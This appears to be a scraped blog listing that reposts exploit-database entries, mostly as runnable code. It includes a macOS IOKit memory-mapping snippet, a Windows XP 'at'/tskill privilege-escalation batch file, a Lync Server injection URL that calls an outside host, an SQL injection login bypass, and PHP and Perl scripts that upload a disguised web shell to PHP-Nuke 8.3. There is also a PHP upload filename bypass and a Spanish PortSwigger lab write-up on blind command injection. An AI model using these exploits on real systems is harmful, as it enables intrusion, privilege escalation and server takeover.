    HireHackking posted a blog entry in Hacker Technology
    #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <IOKit/IOKitLib.h> int main(){ kern_return_t err; CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator"); if(!matching){ printf("unable to create service matching dictionary\n"); return 0; } io_iterator_t iterator; err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator); if (err != KERN_SUCCESS){ printf("no matches\n"); return 0; } io_service_t service = IOIteratorNext(iterator); if (service == IO_OBJECT_NULL){ printf("unable to find service\n"); return 0; } printf("got service: %x\n", service); io_connect_t conn = MACH_PORT_NULL; err = IOServiceOpen(service, mach_task_self(), 2, &conn); if (err != KERN_SUCCESS){ printf("unable to get user client connection\n"); return 0; }else{ printf("got userclient connection: %x\n", conn); } mach_vm_address_t addr = 0x414100000000; mach_vm_size_t size = 0x1000; err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere); return 0; }
  19. HireHackking

    Blind OS command injection with out-of-band interaction – PortSwigger Write Up

    HireHackking posted a blog entry in Hacker Technology
    En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with out-of-band interaction”. Para resolver el laboratorio tenemos que ocasionar una búsqueda DNS al servidor público de Burp Suite (burpcollaborator.net). Para ello, haremos uso de un Blind OS Command Injection que se encuentra en la función de feedback. Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos: Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones: Con esto listo, enviamos el feedback para captar la petición: Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R: Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más. Sin embargo, entre todos los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos, y, con ello, realizar una búsqueda DNS al servidor de burp suite: Al realizar esta petición si actualizamos la web, nos daremos cuenta de que hemos resuelto el reto: En este caso, sí que es cierto, que lo mejor para realizar los retos estilo «out-of-band» es contar con el Burp Suite PRO para poder hacer uso de la característica de Burp Collaborator client: De hecho, el siguiente y último reto de OS Command Injection (al menos a fecha de enero de 2021) no se puede resolver si no es que con Burp Suite PRO 😥.
  20. HireHackking

    Microsoft Windows XP - 'tskill' Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    @echo off REM REM source: https://www.securityfocus.com/bid/48232/info REM REM Microsoft Windows is prone to a local privilege-escalation vulnerability. REM REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. REM Successful exploits will result in the complete compromise of affected computers. REM Failed exploit attempts may cause a denial-of-service condition. REM echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit start time /T > time.txt tskill explorer time 13:36:59 > nul at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y echo [*] Backup time time < time.txt
  21. HireHackking

    Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48235/info Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected. https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//
  22. HireHackking

    WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48233/info WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WebFileExplorer 3.6 is vulnerable; other versions may also be affected. Supplying the following input to the username or password field is sufficient to exploit these issues: user: admin' or '1=1 pass: anything
  23. HireHackking

    PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48257/info Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. Phpnuke 8.3 is vulnerable; other versions may also be affected. <?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_'; //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo " Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data = post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) { $curl = curl_init($address); curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)"); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($curl); curl_close($curl); return $content; } ?>
  24. HireHackking

    PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48257/info Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. Phpnuke 8.3 is vulnerable; other versions may also be affected. #!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ################################################### use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print " Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!; while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data', Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit;
  25. HireHackking

    PHP 5.3.6 - Security Bypass

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48259/info PHP is prone to a security-bypass vulnerability. Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks. PHP 5.3.6 is vulnerable; other versions may also be affected. HTTP Request: ==== POST /file-upload-fuzz/recv_dump.php HTTP/1.0 host: blog.security.localhost content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$ content-length: 200 ------------ThIs_Is_tHe_bouNdaRY_$ Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass"; Content-Type: text/plain any ------------ThIs_Is_tHe_bouNdaRY_$-- HTTP Response: ==== HTTP/1.1 200 OK Date: Fri, 27 May 2011 11:35:08 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 30 Connection: close Content-Type: text/html /anything.here.slash-will-pass PHP script: ===== <?php if (!empty($_FILES['contents'])) { // process file upload echo $_FILES['contents']['name']; unlink($_FILES['contents']['tmp_name']); }